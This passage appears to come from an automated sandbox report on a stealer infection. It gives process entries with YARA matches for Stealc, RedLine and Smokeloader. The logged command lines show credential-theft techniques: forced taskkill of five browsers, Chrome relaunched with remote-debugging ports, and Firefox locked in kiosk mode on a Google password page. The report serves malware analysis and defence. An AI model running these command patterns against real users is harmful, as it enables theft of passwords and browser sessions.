                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.3363688901.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 68%, ReversingLabs
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                Start time:07:52:27
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe"
                                                                                                                                                                                                                                                Imagebase:0xb20000
                                                                                                                                                                                                                                                File size:964'608 bytes
                                                                                                                                                                                                                                                MD5 hash:D314453DBA24064A56B135AEB166CDDA
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                Start time:07:52:29
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                Imagebase:0xd40000
                                                                                                                                                                                                                                                File size:74'240 bytes
                                                                                                                                                                                                                                                MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                Start time:07:52:29
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                Start time:07:52:30
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                Start time:07:52:31
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                                Imagebase:0xd40000
                                                                                                                                                                                                                                                File size:74'240 bytes
                                                                                                                                                                                                                                                MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                Start time:07:52:31
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff70f330000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                Start time:07:52:31
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                                Imagebase:0xd40000
                                                                                                                                                                                                                                                File size:74'240 bytes
                                                                                                                                                                                                                                                MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                Start time:07:52:31
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                                Start time:07:52:32
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                                Imagebase:0xd40000
                                                                                                                                                                                                                                                File size:74'240 bytes
                                                                                                                                                                                                                                                MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                Start time:07:52:32
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                Start time:07:52:32
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                                Imagebase:0xd40000
                                                                                                                                                                                                                                                File size:74'240 bytes
                                                                                                                                                                                                                                                MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                Start time:07:52:32
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                                Start time:07:52:32
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                File size:676'768 bytes
                                                                                                                                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                Start time:07:52:33
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                                                                                                                                                                                                                                                Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                File size:676'768 bytes
                                                                                                                                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                                Start time:07:52:33
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                File size:676'768 bytes
                                                                                                                                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                                Start time:07:52:36
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43d925f0-9685-4c56-9e32-dc32a554bcb7} 6580 "\\.\pipe\gecko-crash-server-pipe.6580" 1c7a166f310 socket
                                                                                                                                                                                                                                                Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                File size:676'768 bytes
                                                                                                                                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                                Start time:07:52:36
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe"
                                                                                                                                                                                                                                                Imagebase:0x700000
                                                                                                                                                                                                                                                File size:1'794'560 bytes
                                                                                                                                                                                                                                                MD5 hash:BD77AFDA9F7533654B270DC7196689CF
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000002.3298144707.000000000139E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000003.2601702185.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000002.3268782554.0000000000701000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                Start time:07:52:41
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe"
                                                                                                                                                                                                                                                Imagebase:0xb20000
                                                                                                                                                                                                                                                File size:964'608 bytes
                                                                                                                                                                                                                                                MD5 hash:D314453DBA24064A56B135AEB166CDDA
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                                Start time:07:52:47
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe"
                                                                                                                                                                                                                                                Imagebase:0xb60000
                                                                                                                                                                                                                                                File size:2'817'536 bytes
                                                                                                                                                                                                                                                MD5 hash:B0B3FC8A43169DD5D7E252EF410E48B5
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                                Start time:07:52:49
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3032 -parentBuildID 20230927232528 -prefsHandle 3116 -prefMapHandle 3112 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0925204-3e74-4449-abae-cbe6b6d93c42} 6580 "\\.\pipe\gecko-crash-server-pipe.6580" 1c7b3908810 rdd
                                                                                                                                                                                                                                                Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                File size:676'768 bytes
                                                                                                                                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                                Start time:07:52:50
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                Imagebase:0xd40000
                                                                                                                                                                                                                                                File size:74'240 bytes
                                                                                                                                                                                                                                                MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                                Start time:07:52:50
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                                Start time:07:52:50
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe"
                                                                                                                                                                                                                                                Imagebase:0x700000
                                                                                                                                                                                                                                                File size:1'794'560 bytes
                                                                                                                                                                                                                                                MD5 hash:BD77AFDA9F7533654B270DC7196689CF
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000021.00000002.3470503446.0000000000701000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000021.00000003.2763862507.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                                Start time:07:52:52
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                                Start time:07:52:53
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2684 --field-trial-handle=2528,i,13978384918087299691,6631337269528066298,262144 /prefetch:8
                                                                                                                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                                Start time:07:52:56
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe"
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                File size:1'968'640 bytes
                                                                                                                                                                                                                                                MD5 hash:C371507551999618FA1DCEB764333BC0
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000024.00000002.4211879385.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000024.00000002.4175579717.0000000000E0C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                                Start time:07:53:00
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe"
                                                                                                                                                                                                                                                Imagebase:0xb20000
                                                                                                                                                                                                                                                File size:964'608 bytes
                                                                                                                                                                                                                                                MD5 hash:D314453DBA24064A56B135AEB166CDDA
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                                Start time:07:53:09
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe"
                                                                                                                                                                                                                                                Imagebase:0x700000
                                                                                                                                                                                                                                                File size:1'794'560 bytes
                                                                                                                                                                                                                                                MD5 hash:BD77AFDA9F7533654B270DC7196689CF
                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000002.3347691049.0000000000701000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000003.3026033423.0000000005280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000002.3384712740.000000000146B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                                Start time:07:53:09
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe"
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                File size:4'438'776 bytes
                                                                                                                                                                                                                                                MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                                Start time:07:53:17
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe"
                                                                                                                                                                                                                                                Imagebase:0x260000
                                                                                                                                                                                                                                                File size:727'552 bytes
                                                                                                                                                                                                                                                MD5 hash:28E568616A7B792CAC1726DEB77D9039
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                                • Detection: 71%, ReversingLabs
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                                Start time:07:53:17
                                                                                                                                                                                                                                                Start date:13/12/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
